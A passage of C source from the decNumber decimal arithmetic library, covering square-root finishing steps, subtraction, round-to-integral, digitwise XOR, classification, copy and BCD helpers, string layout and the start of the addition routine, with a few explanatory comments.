*/ /* Here workset.digits=maxp and t=0.5, and a->digits determines */ /* the ulp */ workset.digits--; /* maxp-1 is OK now */ t->exponent=-a->digits-1; /* make 0.5 ulp */ decAddOp(b, a, t, &workset, DECNEG, &ignore); /* b = a - 0.5 ulp */ workset.round=DEC_ROUND_UP; decMultiplyOp(b, b, b, &workset, &ignore); /* b = mulru(b, b) */ decCompareOp(b, f, b, &workset, COMPARE, &ignore); /* b ? f, reversed */ if (decNumberIsNegative(b)) { /* f < b [i.e., b > f] */ /* this is the more common adjustment, though both are rare */ t->exponent++; /* make 1.0 ulp */ t->lsu[0]=1; /* .. */ decAddOp(a, a, t, &workset, DECNEG, &ignore); /* a = a - 1 ulp */ /* assign to approx [round to length] */ approxset.emin-=exp/2; /* adjust to match a */ approxset.emax-=exp/2; decAddOp(a, &dzero, a, &approxset, 0, &ignore); } else { decAddOp(b, a, t, &workset, 0, &ignore); /* b = a + 0.5 ulp */ workset.round=DEC_ROUND_DOWN; decMultiplyOp(b, b, b, &workset, &ignore); /* b = mulrd(b, b) */ decCompareOp(b, b, f, &workset, COMPARE, &ignore); /* b ? f */ if (decNumberIsNegative(b)) { /* b < f */ t->exponent++; /* make 1.0 ulp */ t->lsu[0]=1; /* .. */ decAddOp(a, a, t, &workset, 0, &ignore); /* a = a + 1 ulp */ /* assign to approx [round to length] */ approxset.emin-=exp/2; /* adjust to match a */ approxset.emax-=exp/2; decAddOp(a, &dzero, a, &approxset, 0, &ignore); } } /* [no errors are possible in the above, and rounding/inexact during */ /* estimation are irrelevant, so status was not accumulated] */ /* Here, 0.1 <= a < 1 (still), so adjust back */ a->exponent+=exp/2; /* set correct exponent */ /* count droppable zeros [after any subnormal rounding] by */ /* trimming a copy */ decNumberCopy(b, a); decTrim(b, set, 1, &dropped); /* [drops trailing zeros] */ /* Set Inexact and Rounded. The answer can only be exact if */ /* it is short enough so that squaring it could fit in workp digits, */ /* and it cannot have trailing zeros due to clamping, so these are */ /* the only (relatively rare) conditions a careful check is needed */ if (b->digits*2-1 > workp && !set->clamp) { /* cannot fit */ status|=DEC_Inexact|DEC_Rounded; } else { /* could be exact/unrounded */ uInt mstatus=0; /* local status */ decMultiplyOp(b, b, b, &workset, &mstatus); /* try the multiply */ if (mstatus&DEC_Overflow) { /* result just won't fit */ status|=DEC_Inexact|DEC_Rounded; } else { /* plausible */ decCompareOp(t, b, rhs, &workset, COMPARE, &mstatus); /* b ? rhs */ if (!ISZERO(t)) status|=DEC_Inexact|DEC_Rounded; /* not equal */ else { /* is Exact */ /* here, dropped is the count of trailing zeros in 'a' */ /* use closest exponent to ideal... 
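*/
/* [Editor's note] e.g. for rhs=1E-4 the ideal exponent is -4/2 = -2, */
/* so the exact result is preferred as 1E-2 (0.01)                    */
/* ..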
*/ Int todrop=ideal-a->exponent; /* most that can be dropped */ if (todrop<0) status|=DEC_Rounded; /* ideally would add 0s */ else { /* unrounded */ if (dropped<todrop) { /* clamp to those available */ todrop=dropped; status|=DEC_Clamped; } if (todrop>0) { /* have some to drop */ decShiftToLeast(a->lsu, D2U(a->digits), todrop); a->exponent+=todrop; /* maintain numerical value */ a->digits-=todrop; /* new length */ } } } } } /* double-check Underflow, as perhaps the result could not have */ /* been subnormal (initial argument too big), or it is now Exact */ if (status&DEC_Underflow) { Int ae=rhs->exponent+rhs->digits-1; /* adjusted exponent */ /* check if truly subnormal */ #if DECEXTFLAG /* DEC_Subnormal too */ if (ae>=set->emin*2) status&=~(DEC_Subnormal|DEC_Underflow); #else if (ae>=set->emin*2) status&=~DEC_Underflow; #endif /* check if truly inexact */ if (!(status&DEC_Inexact)) status&=~DEC_Underflow; } decNumberCopy(res, a); /* a is now the result */ } while(0); /* end protected */ if (allocbuff!=NULL) free(allocbuff); /* drop any storage used */ if (allocbufa!=NULL) free(allocbufa); /* .. */ if (allocbufb!=NULL) free(allocbufb); /* .. */ #if DECSUBSET if (allocrhs !=NULL) free(allocrhs); /* .. */ #endif if (status!=0) decStatus(res, status, set);/* then report status */ #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberSquareRoot */ /* ------------------------------------------------------------------ */ /* decNumberSubtract -- subtract two Numbers */ /* */ /* This computes C = A - B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X-X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* */ /* C must have space for set->digits digits. */ /* ------------------------------------------------------------------ */ decNumber * decNumberSubtract(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { uInt status=0; /* accumulator */ decAddOp(res, lhs, rhs, set, DECNEG, &status); if (status!=0) decStatus(res, status, set); #if DECCHECK decCheckInexact(res, set); #endif return res; } /* decNumberSubtract */ /* ------------------------------------------------------------------ */ /* decNumberToIntegralExact -- round-to-integral-value with InExact */ /* decNumberToIntegralValue -- round-to-integral-value */ /* */ /* res is the result */ /* rhs is input number */ /* set is the context */ /* */ /* res must have space for any value of rhs. */ /* */ /* This implements the IEEE special operators and therefore treats */ /* special values as valid. For finite numbers it returns */ /* rescale(rhs, 0) if rhs->exponent is <0. */ /* Otherwise the result is rhs (so no error is possible, except for */ /* sNaN). */ /* */ /* The context is used for rounding mode and status after sNaN, but */ /* the digits setting is ignored. The Exact version will signal */ /* Inexact if the result differs numerically from rhs; the other */ /* never signals Inexact. 
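*/

/* [Editor's sketch] Illustrative use of the two round-to-integral      */
/* routines below; a minimal example that is ours and is not compiled.  */
/* Rounding is set to HALF_EVEN explicitly, so ties go to the even      */
/* digit (the base context defaults to HALF_UP).                        */
#if 0
#define DECNUMDIGITS 34
#include "decNumber.h"
#include <stdio.h>
static void exampleToIntegral(void) {
  decContext set;
  decNumber a, r;
  char out[DECNUMDIGITS+14];
  decContextDefault(&set, DEC_INIT_BASE);
  set.traps=0;
  set.round=DEC_ROUND_HALF_EVEN;
  decNumberFromString(&a, "2.5", &set);
  decNumberToIntegralValue(&r, &a, &set); /* tie to even: expect 2 */
  printf("tointegral(2.5) -> %s\n", decNumberToString(&r, out));
  decNumberFromString(&a, "3.5", &set);
  decNumberToIntegralExact(&r, &a, &set); /* expect 4, with Inexact */
                                          /* recorded in set.status */
  printf("tointegral(3.5) -> %s\n", decNumberToString(&r, out));
  }
#endif
/*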
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberToIntegralExact(decNumber *res, const decNumber *rhs, decContext *set) { decNumber dn; decContext workset; /* working context */ uInt status=0; /* accumulator */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, set)) return res; #endif /* handle infinities and NaNs */ if (SPECIALARG) { if (decNumberIsInfinite(rhs)) decNumberCopy(res, rhs); /* an Infinity */ else decNaNs(res, rhs, NULL, set, &status); /* a NaN */ } else { /* finite */ /* have a finite number; no error possible (res must be big enough) */ if (rhs->exponent>=0) return decNumberCopy(res, rhs); /* that was easy, but if negative exponent there is work to do... */ workset=*set; /* clone rounding, etc. */ workset.digits=rhs->digits; /* no length rounding */ workset.traps=0; /* no traps */ decNumberZero(&dn); /* make a number with exponent 0 */ decNumberQuantize(res, rhs, &dn, &workset); status|=workset.status; } if (status!=0) decStatus(res, status, set); return res; } /* decNumberToIntegralExact */ decNumber * decNumberToIntegralValue(decNumber *res, const decNumber *rhs, decContext *set) { decContext workset=*set; /* working context */ workset.traps=0; /* no traps */ decNumberToIntegralExact(res, rhs, &workset); /* this never affects set, except for sNaNs; NaN will have been set */ /* or propagated already, so no need to call decStatus */ set->status|=workset.status&DEC_Invalid_operation; return res; } /* decNumberToIntegralValue */ /* ------------------------------------------------------------------ */ /* decNumberXor -- XOR two Numbers, digitwise */ /* */ /* This computes C = A ^ B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X^X) */ /* lhs is A */ /* rhs is B */ /* set is the context (used for result length and error report) */ /* */ /* C must have space for set->digits digits. */ /* */ /* Logical function restrictions apply (see above); a NaN is */ /* returned with Invalid_operation if a restriction is violated. */ /* ------------------------------------------------------------------ */ decNumber * decNumberXor(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set) { const Unit *ua, *ub; /* -> operands */ const Unit *msua, *msub; /* -> operand msus */ Unit *uc, *msuc; /* -> result and its msu */ Int msudigs; /* digits in res msu */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif if (lhs->exponent!=0 || decNumberIsSpecial(lhs) || decNumberIsNegative(lhs) || rhs->exponent!=0 || decNumberIsSpecial(rhs) || decNumberIsNegative(rhs)) { decStatus(res, DEC_Invalid_operation, set); return res; } /* operands are valid */ ua=lhs->lsu; /* bottom-up */ ub=rhs->lsu; /* .. */ uc=res->lsu; /* .. 
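*/
/* Worked example (editor's illustration): lhs=1101 and rhs=0110 */
/* give 1011, one decimal digit at a time; any digit other than 0 */
/* or 1 in either operand makes j exceed 1 in the loop below, which */
/* returns a NaN with Invalid_operation. */
/* ..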
*/ msua=ua+D2U(lhs->digits)-1; /* -> msu of lhs */ msub=ub+D2U(rhs->digits)-1; /* -> msu of rhs */ msuc=uc+D2U(set->digits)-1; /* -> msu of result */ msudigs=MSUDIGITS(set->digits); /* [faster than remainder] */ for (; uc<=msuc; ua++, ub++, uc++) { /* Unit loop */ Unit a, b; /* extract units */ if (ua>msua) a=0; else a=*ua; if (ub>msub) b=0; else b=*ub; *uc=0; /* can now write back */ if (a|b) { /* maybe 1 bits to examine */ Int i, j; /* This loop could be unrolled and/or use BIN2BCD tables */ for (i=0; i<DECDPUN; i++) { if ((a^b)&1) *uc=*uc+(Unit)powers[i]; /* effect XOR */ j=a%10; a=a/10; j|=b%10; b=b/10; if (j>1) { decStatus(res, DEC_Invalid_operation, set); return res; } if (uc==msuc && i==msudigs-1) break; /* just did final digit */ } /* each digit */ } /* non-zero */ } /* each unit */ /* [here uc-1 is the msu of the result] */ res->digits=decGetDigits(res->lsu, uc-res->lsu); res->exponent=0; /* integer */ res->bits=0; /* sign=0 */ return res; /* [no status to set] */ } /* decNumberXor */ /* ================================================================== */ /* Utility routines */ /* ================================================================== */ /* ------------------------------------------------------------------ */ /* decNumberClass -- return the decClass of a decNumber */ /* dn -- the decNumber to test */ /* set -- the context to use for Emin */ /* returns the decClass enum */ /* ------------------------------------------------------------------ */ enum decClass decNumberClass(const decNumber *dn, decContext *set) { if (decNumberIsSpecial(dn)) { if (decNumberIsQNaN(dn)) return DEC_CLASS_QNAN; if (decNumberIsSNaN(dn)) return DEC_CLASS_SNAN; /* must be an infinity */ if (decNumberIsNegative(dn)) return DEC_CLASS_NEG_INF; return DEC_CLASS_POS_INF; } /* is finite */ if (decNumberIsNormal(dn, set)) { /* most common */ if (decNumberIsNegative(dn)) return DEC_CLASS_NEG_NORMAL; return DEC_CLASS_POS_NORMAL; } /* is subnormal or zero */ if (decNumberIsZero(dn)) { /* most common */ if (decNumberIsNegative(dn)) return DEC_CLASS_NEG_ZERO; return DEC_CLASS_POS_ZERO; } if (decNumberIsNegative(dn)) return DEC_CLASS_NEG_SUBNORMAL; return DEC_CLASS_POS_SUBNORMAL; } /* decNumberClass */ /* ------------------------------------------------------------------ */ /* decNumberClassToString -- convert decClass to a string */ /* */ /* eclass is a valid decClass */ /* returns a constant string describing the class (max 13+1 chars) */ /* ------------------------------------------------------------------ */ const char *decNumberClassToString(enum decClass eclass) { if (eclass==DEC_CLASS_POS_NORMAL) return DEC_ClassString_PN; if (eclass==DEC_CLASS_NEG_NORMAL) return DEC_ClassString_NN; if (eclass==DEC_CLASS_POS_ZERO) return DEC_ClassString_PZ; if (eclass==DEC_CLASS_NEG_ZERO) return DEC_ClassString_NZ; if (eclass==DEC_CLASS_POS_SUBNORMAL) return DEC_ClassString_PS; if (eclass==DEC_CLASS_NEG_SUBNORMAL) return DEC_ClassString_NS; if (eclass==DEC_CLASS_POS_INF) return DEC_ClassString_PI; if (eclass==DEC_CLASS_NEG_INF) return DEC_ClassString_NI; if (eclass==DEC_CLASS_QNAN) return DEC_ClassString_QN; if (eclass==DEC_CLASS_SNAN) return DEC_ClassString_SN; return DEC_ClassString_UN; /* Unknown */ } /* decNumberClassToString */ /* ------------------------------------------------------------------ */ /* decNumberCopy -- copy a number */ /* */ /* dest is the target decNumber */ /* src is the source decNumber */ /* returns dest */ /* */ /* (dest==src is allowed and is a no-op) */ /* All fields are updated as 
required. This is a utility operation, */ /* so special values are unchanged and no error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCopy(decNumber *dest, const decNumber *src) { #if DECCHECK if (src==NULL) return decNumberZero(dest); #endif if (dest==src) return dest; /* no copy required */ /* Use explicit assignments here as structure assignment could copy */ /* more than just the lsu (for small DECDPUN). This would not affect */ /* the value of the results, but could disturb test harness spill */ /* checking. */ dest->bits=src->bits; dest->exponent=src->exponent; dest->digits=src->digits; dest->lsu[0]=src->lsu[0]; if (src->digits>DECDPUN) { /* more Units to come */ const Unit *smsup, *s; /* work */ Unit *d; /* .. */ /* memcpy for the remaining Units would be safe as they cannot */ /* overlap. However, this explicit loop is faster in short cases. */ d=dest->lsu+1; /* -> first destination */ smsup=src->lsu+D2U(src->digits); /* -> source msu+1 */ for (s=src->lsu+1; s<smsup; s++, d++) *d=*s; } return dest; } /* decNumberCopy */ /* ------------------------------------------------------------------ */ /* decNumberCopyAbs -- quiet absolute value operator */ /* */ /* This sets C = abs(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* */ /* C must have space for set->digits digits. */ /* No exception or error can occur; this is a quiet bitwise operation.*/ /* See also decNumberAbs for a checking version of this. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCopyAbs(decNumber *res, const decNumber *rhs) { #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, DECUNCONT)) return res; #endif decNumberCopy(res, rhs); res->bits&=~DECNEG; /* turn off sign */ return res; } /* decNumberCopyAbs */ /* ------------------------------------------------------------------ */ /* decNumberCopyNegate -- quiet negate value operator */ /* */ /* This sets C = negate(A) */ /* */ /* res is C, the result. C may be A */ /* rhs is A */ /* */ /* C must have space for set->digits digits. */ /* No exception or error can occur; this is a quiet bitwise operation.*/ /* See also decNumberMinus for a checking version of this. */ /* ------------------------------------------------------------------ */ decNumber * decNumberCopyNegate(decNumber *res, const decNumber *rhs) { #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, DECUNCONT)) return res; #endif decNumberCopy(res, rhs); res->bits^=DECNEG; /* invert the sign */ return res; } /* decNumberCopyNegate */ /* ------------------------------------------------------------------ */ /* decNumberCopySign -- quiet copy and set sign operator */ /* */ /* This sets C = A with the sign of B */ /* */ /* res is C, the result. C may be A */ /* lhs is A */ /* rhs is B */ /* */ /* C must have space for set->digits digits. 
*/ /* No exception or error can occur; this is a quiet bitwise operation.*/ /* ------------------------------------------------------------------ */ decNumber * decNumberCopySign(decNumber *res, const decNumber *lhs, const decNumber *rhs) { uByte sign; /* rhs sign */ #if DECCHECK if (decCheckOperands(res, DECUNUSED, rhs, DECUNCONT)) return res; #endif sign=rhs->bits & DECNEG; /* save sign bit */ decNumberCopy(res, lhs); res->bits&=~DECNEG; /* clear the sign */ res->bits|=sign; /* set from rhs */ return res; } /* decNumberCopySign */ /* ------------------------------------------------------------------ */ /* decNumberGetBCD -- get the coefficient in BCD8 */ /* dn is the source decNumber */ /* bcd is the uByte array that will receive dn->digits BCD bytes, */ /* most-significant at offset 0 */ /* returns bcd */ /* */ /* bcd must have at least dn->digits bytes. No error is possible; if */ /* dn is a NaN or Infinite, digits must be 1 and the coefficient 0. */ /* ------------------------------------------------------------------ */ uByte * decNumberGetBCD(const decNumber *dn, uint8_t *bcd) { uByte *ub=bcd+dn->digits-1; /* -> lsd */ const Unit *up=dn->lsu; /* Unit pointer, -> lsu */ #if DECDPUN==1 /* trivial simple copy */ for (; ub>=bcd; ub--, up++) *ub=*up; #else /* chopping needed */ uInt u=*up; /* work */ uInt cut=DECDPUN; /* downcounter through unit */ for (; ub>=bcd; ub--) { *ub=(uByte)(u%10); /* [*6554 trick inhibits, here] */ u=u/10; cut--; if (cut>0) continue; /* more in this unit */ up++; u=*up; cut=DECDPUN; } #endif return bcd; } /* decNumberGetBCD */ /* ------------------------------------------------------------------ */ /* decNumberSetBCD -- set (replace) the coefficient from BCD8 */ /* dn is the target decNumber */ /* bcd is the uByte array that will source n BCD bytes, most- */ /* significant at offset 0 */ /* n is the number of digits in the source BCD array (bcd) */ /* returns dn */ /* */ /* dn must have space for at least n digits. No error is possible; */ /* if dn is a NaN, or Infinite, or is to become a zero, n must be 1 */ /* and bcd[0] zero. 
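*/
/* Round-trip sketch (editor's illustration; 'num' is a hypothetical */
/* already-initialized decNumber): */
/*   uByte bcd8[DECNUMDIGITS]; */
/*   decNumberGetBCD(&num, bcd8);             [num.digits bytes, msd first] */
/*   decNumberSetBCD(&num, bcd8, num.digits); [coefficient restored] */
/* Only the coefficient and digit count move; sign and exponent are */
/* untouched by both routines. */
/*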
*/ /* ------------------------------------------------------------------ */ decNumber * decNumberSetBCD(decNumber *dn, const uByte *bcd, uInt n) { Unit *up = dn->lsu + D2U(n) - 1; /* -> msu [target pointer] */ const uByte *ub=bcd; /* -> source msd */ #if DECDPUN==1 /* trivial simple copy */ for (; ub<bcd+n; ub++, up--) *up=*ub; #else /* some assembly needed */ /* calculate how many digits in msu, and hence first cut */ Int cut=MSUDIGITS(n); /* [faster than remainder] */ for (;up>=dn->lsu; up--) { /* each Unit from msu */ *up=0; /* will take <=DECDPUN digits */ for (; cut>0; ub++, cut--) *up=X10(*up)+*ub; cut=DECDPUN; /* next Unit has all digits */ } #endif dn->digits=n; /* set digit count */ return dn; } /* decNumberSetBCD */ /* ------------------------------------------------------------------ */ /* decNumberIsNormal -- test normality of a decNumber */ /* dn is the decNumber to test */ /* set is the context to use for Emin */ /* returns 1 if |dn| is finite and >=Nmin, 0 otherwise */ /* ------------------------------------------------------------------ */ Int decNumberIsNormal(const decNumber *dn, decContext *set) { Int ae; /* adjusted exponent */ #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, set)) return 0; #endif if (decNumberIsSpecial(dn)) return 0; /* not finite */ if (decNumberIsZero(dn)) return 0; /* not non-zero */ ae=dn->exponent+dn->digits-1; /* adjusted exponent */ if (ae<set->emin) return 0; /* is subnormal */ return 1; } /* decNumberIsNormal */ /* ------------------------------------------------------------------ */ /* decNumberIsSubnormal -- test subnormality of a decNumber */ /* dn is the decNumber to test */ /* set is the context to use for Emin */ /* returns 1 if |dn| is finite, non-zero, and <Nmin, 0 otherwise */ /* ------------------------------------------------------------------ */ Int decNumberIsSubnormal(const decNumber *dn, decContext *set) { Int ae; /* adjusted exponent */ #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, set)) return 0; #endif if (decNumberIsSpecial(dn)) return 0; /* not finite */ if (decNumberIsZero(dn)) return 0; /* not non-zero */ ae=dn->exponent+dn->digits-1; /* adjusted exponent */ if (ae<set->emin) return 1; /* is subnormal */ return 0; } /* decNumberIsSubnormal */ /* ------------------------------------------------------------------ */ /* decNumberTrim -- remove insignificant zeros */ /* */ /* dn is the number to trim */ /* returns dn */ /* */ /* All fields are updated as required. This is a utility operation, */ /* so special values are unchanged and no error is possible. */ /* ------------------------------------------------------------------ */ decNumber * decNumberTrim(decNumber *dn) { Int dropped; /* work */ decContext set; /* .. */ #if DECCHECK if (decCheckOperands(DECUNRESU, DECUNUSED, dn, DECUNCONT)) return dn; #endif decContextDefault(&set, DEC_INIT_BASE); /* clamp=0 */ return decTrim(dn, &set, 0, &dropped); } /* decNumberTrim */ /* ------------------------------------------------------------------ */ /* decNumberVersion -- return the name and version of this module */ /* */ /* No error is possible. */ /* ------------------------------------------------------------------ */ const char * decNumberVersion(void) { return DECVERSION; } /* decNumberVersion */ /* ------------------------------------------------------------------ */ /* decNumberZero -- set a number to 0 */ /* */ /* dn is the number to set, with space for one digit */ /* returns dn */ /* */ /* No error is possible. 
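*/
/* Worked example for decNumberIsNormal/decNumberIsSubnormal above */
/* (editor's illustration): with set->emin=-95, the value 1.23E-97 */
/* has digits=3 and exponent=-99, so the adjusted exponent is */
/* -99+3-1 = -97; that is below emin, so decNumberIsNormal returns */
/* 0 and decNumberIsSubnormal returns 1. */
/*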
*/ /* ------------------------------------------------------------------ */ /* Memset is not used as it is much slower in some environments. */ decNumber * decNumberZero(decNumber *dn) { #if DECCHECK if (decCheckOperands(dn, DECUNUSED, DECUNUSED, DECUNCONT)) return dn; #endif dn->bits=0; dn->exponent=0; dn->digits=1; dn->lsu[0]=0; return dn; } /* decNumberZero */ /* ================================================================== */ /* Local routines */ /* ================================================================== */ /* ------------------------------------------------------------------ */ /* decToString -- lay out a number into a string */ /* */ /* dn is the number to lay out */ /* string is where to lay out the number */ /* eng is 1 if Engineering, 0 if Scientific */ /* */ /* string must be at least dn->digits+14 characters long */ /* No error is possible. */ /* */ /* Note that this routine can generate a -0 or 0.000. These are */ /* never generated in subset to-number or arithmetic, but can occur */ /* in non-subset arithmetic (e.g., -1*0 or 1.234-1.234). */ /* ------------------------------------------------------------------ */ /* If DECCHECK is enabled the string "?" is returned if a number is */ /* invalid. */ static void decToString(const decNumber *dn, char *string, Flag eng) { Int exp=dn->exponent; /* local copy */ Int e; /* E-part value */ Int pre; /* digits before the '.' */ Int cut; /* for counting digits in a Unit */ char *c=string; /* work [output pointer] */ const Unit *up=dn->lsu+D2U(dn->digits)-1; /* -> msu [input pointer] */ uInt u, pow; /* work */ #if DECCHECK if (decCheckOperands(DECUNRESU, dn, DECUNUSED, DECUNCONT)) { strcpy(string, "?"); return;} #endif if (decNumberIsNegative(dn)) { /* Negatives get a minus */ *c='-'; c++; } if (dn->bits&DECSPECIAL) { /* Is a special value */ if (decNumberIsInfinite(dn)) { strcpy(c, "Inf"); strcpy(c+3, "inity"); return;} /* a NaN */ if (dn->bits&DECSNAN) { /* signalling NaN */ *c='s'; c++; } strcpy(c, "NaN"); c+=3; /* step past */ /* if not a clean non-zero coefficient, that's all there is in a */ /* NaN string */ if (exp!=0 || (*dn->lsu==0 && dn->digits==1)) return; /* [drop through to add integer] */ } /* calculate how many digits in msu, and hence first cut */ cut=MSUDIGITS(dn->digits); /* [faster than remainder] */ cut--; /* power of ten for digit */ if (exp==0) { /* simple integer [common fastpath] */ for (;up>=dn->lsu; up--) { /* each Unit from msu */ u=*up; /* contains DECDPUN digits to lay out */ for (; cut>=0; c++, cut--) TODIGIT(u, cut, c, pow); cut=DECDPUN-1; /* next Unit has all digits */ } *c='\0'; /* terminate the string */ return;} /* non-0 exponent -- assume plain form */ pre=dn->digits+exp; /* digits before '.' */ e=0; /* no E */ if ((exp>0) || (pre<-5)) { /* need exponential form */ e=exp+dn->digits-1; /* calculate E value */ pre=1; /* assume one digit before '.' */ if (eng && (e!=0)) { /* engineering: may need to adjust */ Int adj; /* adjustment */ /* The C remainder operator is undefined for negative numbers, so */ /* a positive remainder calculation must be used here */ if (e<0) { adj=(-e)%3; if (adj!=0) adj=3-adj; } else { /* e>0 */ adj=e%3; } e=e-adj; /* if dealing with zero still produce an exponent which is a */ /* multiple of three, as expected, but there will only be the */ /* one zero before the E, still. Otherwise note the padding. 
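For example (editor's illustration): 1.2345E+5 has e=5, so adj=2;
e becomes 3 and pre becomes 1+2=3, laying the value out as
123.45E+3.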
*/ if (!ISZERO(dn)) pre+=adj; else { /* is zero */ if (adj!=0) { /* 0.00Esnn needed */ e=e+3; pre=-(2-adj); } } /* zero */ } /* eng */ } /* need exponent */ /* lay out the digits of the coefficient, adding 0s and . as needed */ u=*up; if (pre>0) { /* xxx.xxx or xx00 (engineering) form */ Int n=pre; for (; pre>0; pre--, c++, cut--) { if (cut<0) { /* need new Unit */ if (up==dn->lsu) break; /* out of input digits (pre>digits) */ up--; cut=DECDPUN-1; u=*up; } TODIGIT(u, cut, c, pow); } if (n<dn->digits) { /* more to come, after '.' */ *c='.'; c++; for (;; c++, cut--) { if (cut<0) { /* need new Unit */ if (up==dn->lsu) break; /* out of input digits */ up--; cut=DECDPUN-1; u=*up; } TODIGIT(u, cut, c, pow); } } else for (; pre>0; pre--, c++) *c='0'; /* 0 padding (for engineering) needed */ } else { /* 0.xxx or 0.000xxx form */ *c='0'; c++; *c='.'; c++; for (; pre<0; pre++, c++) *c='0'; /* add any 0's after '.' */ for (; ; c++, cut--) { if (cut<0) { /* need new Unit */ if (up==dn->lsu) break; /* out of input digits */ up--; cut=DECDPUN-1; u=*up; } TODIGIT(u, cut, c, pow); } } /* Finally add the E-part, if needed. It will never be 0, has a base maximum and minimum of +999999999 through -999999999, but could range down to -1999999998 for subnormal numbers */ if (e!=0) { Flag had=0; /* 1=had non-zero */ *c='E'; c++; *c='+'; c++; /* assume positive */ u=e; /* .. */ if (e<0) { *(c-1)='-'; /* oops, need - */ u=-e; /* uInt, please */ } /* lay out the exponent [_itoa or equivalent is not ANSI C] */ for (cut=9; cut>=0; cut--) { TODIGIT(u, cut, c, pow); if (*c=='0' && !had) continue; /* skip leading zeros */ had=1; /* had non-0 */ c++; /* step for next */ } /* cut */ } *c='\0'; /* terminate the string (all paths) */ return; } /* decToString */ /* ------------------------------------------------------------------ */ /* decAddOp -- add/subtract operation */ /* */ /* This computes C = A + B */ /* */ /* res is C, the result. C may be A and/or B (e.g., X=X+X) */ /* lhs is A */ /* rhs is B */ /* set is the context */ /* negate is DECNEG if rhs should be negated, or 0 otherwise */ /* status accumulates status for the caller */ /* */ /* C must have space for set->digits digits. */ /* Inexact in status must be 0 for correct Exact zero sign in result */ /* ------------------------------------------------------------------ */ /* If possible, the coefficient is calculated directly into C. */ /* However, if: */ /* -- a digits+1 calculation is needed because the numbers are */ /* unaligned and span more than set->digits digits */ /* -- a carry to digits+1 digits looks possible */ /* -- C is the same as A or B, and the result would destructively */ /* overlap the A or B coefficient */ /* then the result must be calculated into a temporary buffer. In */ /* this case a local (stack) buffer is used if possible, and only if */ /* too long for that does malloc become the final resort. */ /* */ /* Misalignment is handled as follows: */ /* Apad: (AExp>BExp) Swap operands and proceed as for BExp>AExp. */ /* BPad: Apply the padding by a combination of shifting (whole */ /* units) and multiplication (part units). */ /* */ /* Addition, especially x=x+1, is speed-critical. */ /* The static buffer is larger than might be expected to allow for */ /* calls from higher-level functions (notably exp). 
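*/
/* Worked alignment example (editor's illustration, assuming */
/* DECDPUN=3): for 123E+2 plus 45E+0, padding=-2, so the operands */
/* are swapped; the new rhs (123E+2) then needs rhsshift= */
/* D2U(2+1)-1=0 whole units and mult=powers[2]=100, so the unit */
/* add below computes 45+123*100=12345 with exponent 0. */
/*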
*/ /* ------------------------------------------------------------------ */ static decNumber * decAddOp(decNumber *res, const decNumber *lhs, const decNumber *rhs, decContext *set, uByte negate, uInt *status) { #if DECSUBSET decNumber *alloclhs=NULL; /* non-NULL if rounded lhs allocated */ decNumber *allocrhs=NULL; /* .., rhs */ #endif Int rhsshift; /* working shift (in Units) */ Int maxdigits; /* longest logical length */ Int mult; /* multiplier */ Int residue; /* rounding accumulator */ uByte bits; /* result bits */ Flag diffsign; /* non-0 if arguments have different sign */ Unit *acc; /* accumulator for result */ Unit accbuff[SD2U(DECBUFFER*2+20)]; /* local buffer [*2+20 reduces many */ /* allocations when called from */ /* other operations, notably exp] */ Unit *allocacc=NULL; /* -> allocated acc buffer, iff allocated */ Int reqdigits=set->digits; /* local copy; requested DIGITS */ Int padding; /* work */ #if DECCHECK if (decCheckOperands(res, lhs, rhs, set)) return res; #endif do { /* protect allocated storage */ #if DECSUBSET if (!set->extended) { /* reduce operands and set lostDigits status, as needed */ if (lhs->digits>reqdigits) { alloclhs=decRoundOperand(lhs, set, status); if (alloclhs==NULL) break; lhs=alloclhs; } if (rhs->digits>reqdigits) { allocrhs=decRoundOperand(rhs, set, status); if (allocrhs==NULL) break; rhs=allocrhs; } } #endif /* [following code does not require input rounding] */ /* note whether signs differ [used all paths] */ diffsign=(Flag)((lhs->bits^rhs->bits^negate)&DECNEG); /* handle infinities and NaNs */ if (SPECIALARGS) { /* a special bit set */ if (SPECIALARGS & (DECSNAN | DECNAN)) /* a NaN */ decNaNs(res, lhs, rhs, set, status); else { /* one or two infinities */ if (decNumberIsInfinite(lhs)) { /* LHS is infinity */ /* two infinities with different signs is invalid */ if (decNumberIsInfinite(rhs) && diffsign) { *status|=DEC_Invalid_operation; break; } bits=lhs->bits & DECNEG; /* get sign from LHS */ } else bits=(rhs->bits^negate) & DECNEG;/* RHS must be Infinity */ bits|=DECINF; decNumberZero(res); res->bits=bits; /* set +/- infinity */ } /* an infinity */ break; } /* Quick exit for add 0s; return the non-0, modified as need be */ if (ISZERO(lhs)) { Int adjust; /* work */ Int lexp=lhs->exponent; /* save in case LHS==RES */ bits=lhs->bits; /* .. */ residue=0; /* clear accumulator */ decCopyFit(res, rhs, set, &residue, status); /* copy (as needed) */ res->bits^=negate; /* flip if rhs was negated */ #if DECSUBSET if (set->extended) { /* exponents on zeros count */ #endif /* exponent will be the lower of the two */ adjust=lexp-res->exponent; /* adjustment needed [if -ve] */ if (ISZERO(res)) { /* both 0: special IEEE 854 rules */ if (adjust<0) res->exponent=lexp; /* set exponent */ /* 0-0 gives +0 unless rounding to -infinity, and -0-0 gives -0 */ if (diffsign) { if (set->round!=DEC_ROUND_FLOOR) res->bits=0; else res->bits=DECNEG; /* preserve 0 sign */ } } else { /* non-0 res */ if (adjust<0) { /* 0-padding needed */ if ((res->digits-adjust)>set->digits) { adjust=res->digits-set->digits; /* to fit exactly */ *status|=DEC_Rounded; /* [but exact] */ } res->digits=decShiftToMost(res->lsu, res->digits, -adjust); res->exponent+=adjust; /* set the exponent. 
